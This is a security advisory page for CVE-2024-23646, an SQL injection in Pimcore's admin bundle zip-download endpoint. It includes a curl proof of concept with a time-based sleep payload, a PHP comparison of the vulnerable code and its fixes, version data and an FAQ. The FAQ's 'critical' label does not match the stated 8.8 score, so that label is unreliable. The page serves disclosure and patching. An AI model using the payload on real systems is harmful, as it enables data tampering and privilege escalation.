CVSS: 8.8
CWE: 89, 352
EPSS: 0.059%
CVE-2024-23646: Pimcore Admin Classic Bundle SQL Injection in Admin download files as zip

First published: Wed Jan 24 2024 (Updated: )

### Summary

The application allows creating zip files from the files available on the site. The `selectedIds` parameter of that endpoint is susceptible to SQL injection.

### Details

[downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escapes its parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) does not. The following code should be added:

```php
// Quote each selected id before it is concatenated into the SQL statement
$quotedSelectedIds = [];
foreach ($selectedIds as $selectedId) {
    if ($selectedId) {
        $quotedSelectedIds[] = $db->quote($selectedId);
    }
}
```

### PoC

- Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)
- Log in. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie.
- Run the following script, substituting the values accordingly:

```bash
#!/bin/bash
BASE_URL=http://localhost                                  # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e"       # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3"        # REPLACE THIS!
SQL="(select*from(select(sleep(6)))a)"

curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
  -X GET \
  -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
  -H "Cookie: ${COOKIE}"
```

- The response is delayed by 6 seconds.

### Impact

Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.
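To make the Details section concrete, here is an added illustration (not Pimcore's code) of how the `IN (...)` filter built from `selectedIds` behaves when the parameter is interpolated raw, when each id is quoted as the advisory recommends, and when ids are additionally required to be integers. `quoteValue()` is a stand-in for the page's `$db->quote()`, and the parameter is assumed to arrive as a comma-separated string.

```php
<?php
// Stand-in for a DBAL-style quote(): escape and wrap in single quotes.
function quoteValue(string $v): string
{
    return "'" . str_replace(["\\", "'"], ["\\\\", "\\'"], $v) . "'";
}

// Vulnerable pattern: the raw request parameter becomes part of the SQL text,
// so a comma-separated value can smuggle a subquery into the statement.
function buildFilterUnsafe(string $selectedIds): string
{
    return 'id IN (' . $selectedIds . ')';
}

// Advisory's fix: quote every id individually; a smuggled subquery is then
// just an inert string literal inside the IN list.
function buildFilterQuoted(string $selectedIds): string
{
    $quoted = [];
    foreach (explode(',', $selectedIds) as $selectedId) {
        if ($selectedId !== '') {
            $quoted[] = quoteValue($selectedId);
        }
    }
    return 'id IN (' . implode(',', $quoted) . ')';
}

// Stricter variant: asset ids are integers, so anything else is rejected
// before it gets anywhere near the query.
function buildFilterStrict(string $selectedIds): string
{
    $ids = [];
    foreach (explode(',', $selectedIds) as $selectedId) {
        $selectedId = trim($selectedId);
        if ($selectedId === '') {
            continue;
        }
        if (!ctype_digit($selectedId)) {
            throw new InvalidArgumentException("non-numeric id rejected: $selectedId");
        }
        $ids[] = (int) $selectedId;
    }
    return 'id IN (' . implode(',', $ids) . ')';
}

$payload = '1,(select*from(select(sleep(6)))a)'; // the advisory's PoC value
echo buildFilterUnsafe($payload), PHP_EOL;        // subquery is live SQL
echo buildFilterQuoted($payload), PHP_EOL;        // subquery is a string literal
try {
    buildFilterStrict($payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;               // request rejected outright
}
```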

Credit: security-advisories@github.com

| Affected Software | Affected Version | How to fix |
| --- | --- | --- |
| composer/pimcore/admin-ui-classic-bundle | >=1.0.0 <1.3.2 | 1.3.2 |
| Pimcore admin-ui-classic-bundle | >=1.0.0 <1.3.2 | |


Frequently Asked Questions

  • What is the severity of CVE-2024-23646?

    CVE-2024-23646 is rated as a critical vulnerability because of the SQL injection it allows.

  • How do I fix CVE-2024-23646?

    To fix CVE-2024-23646, upgrade the pimcore/admin-ui-classic-bundle to version 1.3.2 or later.

  • What types of software are affected by CVE-2024-23646?

    CVE-2024-23646 affects versions of the pimcore/admin-ui-classic-bundle from 1.0.0 up to, but not including, 1.3.2.

  • What type of vulnerability is CVE-2024-23646?

    CVE-2024-23646 is classified as an SQL Injection vulnerability.

  • What actions can be taken to mitigate CVE-2024-23646?

    Mitigating actions for CVE-2024-23646 include sanitizing inputs and applying security patches as soon as available.

© 2025 SecAlerts Pty Ltd.